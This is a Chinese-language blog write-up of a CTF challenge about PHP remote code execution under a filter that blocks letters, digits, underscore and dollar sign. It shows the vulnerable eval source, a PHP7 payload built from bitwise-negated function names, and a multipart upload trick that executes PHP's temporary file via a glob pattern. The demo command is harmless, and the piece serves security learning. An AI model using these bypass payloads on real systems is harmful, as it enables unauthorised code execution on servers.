• RCE——远程命令执行(无字母数字篇)

    目录

    题目源码

    题目分析    

    解法

    php7解法

    php版本通用解法

    构建post包

    确定执行文件方法和匹配文件正则

    总结

    题目源码

            我们一起来看一下下面这个远程命令执行的题:

    2. if(isset($_GET['code'])){
    3.     $code = $_GET['code'];
    4.     if(strlen($code)>35){
    5.         die("Long.");
    6.     }
    7.     if(preg_match("/[A-Za-z0-9_$]+/",$code)){
    8.         die("NO.");
    9.     }
    10.     eval($code);
    11. }else{
    12.     highlight_file(__FILE__);
    13. }

    题目分析    

            这道题code接get传参,完了对传进来的内容进行正则匹配,这个正则过滤了大小写、数字、_、$,并且对传进来参数长度也进行了限制,那么这个payload应该怎么写呢,这道题应该怎么解呢?

    解法

    php7解法

            在php版本7以上会支持()()这种形式的命令执行,如下图所示:        那么这道题就可以用这样的方式来做,但是还是会出现字母,我们就会想到编码,get传参使用urlcode编码,但是这种编码对只会对符号进行编码,字母并不在它的编码范围里,这是我们想到取反操作,我们去php里面看看取反吧。        取反得到%8F%97%8F%96%91%99%90,那我们在对这一串进行取反不就又可以变回phpinfo了。那么就可以构造payload

    ?code=(~%8F%97%8F%96%91%99%90)();

            执行成功,我们只用把里面要去反的函数的反码进行更换即可。但是,这种方法只适用于php版本在7以上,低版本并不支持这种形式。我们还需要再想想。

    php版本通用解法

            在php中上传文件,会在临时目录里面写入所上传文件的内容,那我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母,这样我们只需要执行这个临时文件即可,我们一起来试试

    构建post包

            首先我们需要构建上传文件的post包,那么我们写一个文件上传的html文件并用BP进行抓包,其中:

    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXDzjrV2UX482mQRG

    ------WebKitFormBoundaryXDzjrV2UX482mQRG
    Content-Disposition: form-data; name="file"; filename="鏂板缓鏂囨湰鏂囨。 (3).txt"
    Content-Type: text/plain

    #!/bin/bash
    id
    ------WebKitFormBoundaryXDzjrV2UX482mQRG--
            这些是我们需要放到构建的post包里面的内容,只有这样这些文件才会被保存在临时文件之下,我们才可以执行。

    确定执行文件方法和匹配文件正则

            现在post包已经构建好了,我们想想怎么执行,首先肯定想到.  ./ bash 这三种方法,我们只能用.来执行,因为bash有字幕出现,而./需要这个文件有执行权限,.就不用权限,他是将文件作为bash命令解释器的参数来执行的。

            执行方式确定好之后,我们应该怎么确定能准确的执行那个临时文件,因为我们并不知道临时文件的名字,经过查资料之后我们知道php默认的临时文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母,那么我们就可以利用正则来匹配这些特征。

            综上所述,payload构建如下:这里的[@-[]表示匹配大写字母,因为在 ASCII 表中,大写字母的确位于 @[ 之间。

    . /???/????????[@-[]

            那基本问题已经解决了,我们一起构建一下试试         很明显,我们写入的命令id被执行了,我们我们一起分析一下是怎么回事,?>是为了闭合,

            在发包之后会出现200,但是id命令并没有执行,是因为哪个临时文件最后一位会随机大小写字母所以当最后以为是小写的时候我们就匹配不到,我们只能匹配到最后一位是大写字母的时候,所以多尝试几次即可。

    总结

            这道题属于是一个无字母无数字的题目,除了高版本的解法之外,我们更应该关注通用版本的解法,我们主要利用的php代码文件上传在代码执行完之前会存放在临时文件里,我们利用它的默认命名方式来进行一个正则匹配,而且Linux一般文件都不会用大写命名,从而写出这个正则来进行匹配。

  • 相关阅读:
    Godot Identifier “File“ not declared in the current scope.
    搞定!详解MeterSphere 配置外部Mysql5.7的全过程
    用于设计和分析具有恒定近心点半径的低推力螺旋轨迹研究(Matlab代码实现)
    配置、软件配置项、软件配置管理项辨析
    金山表单结果如何自动通知企业微信
    『现学现忘』Docker基础 — 36、CMD指令和ENTRYPOINT指令的区别
    STM32Cube学习(1)——点灯&配置
    Java 8 stream的详细用法
    Python的pip换源详解
    Ubuntu Docker 开启2375端口 【手把手教程】
  • 原文地址:https://blog.csdn.net/m0_69151365/article/details/141096855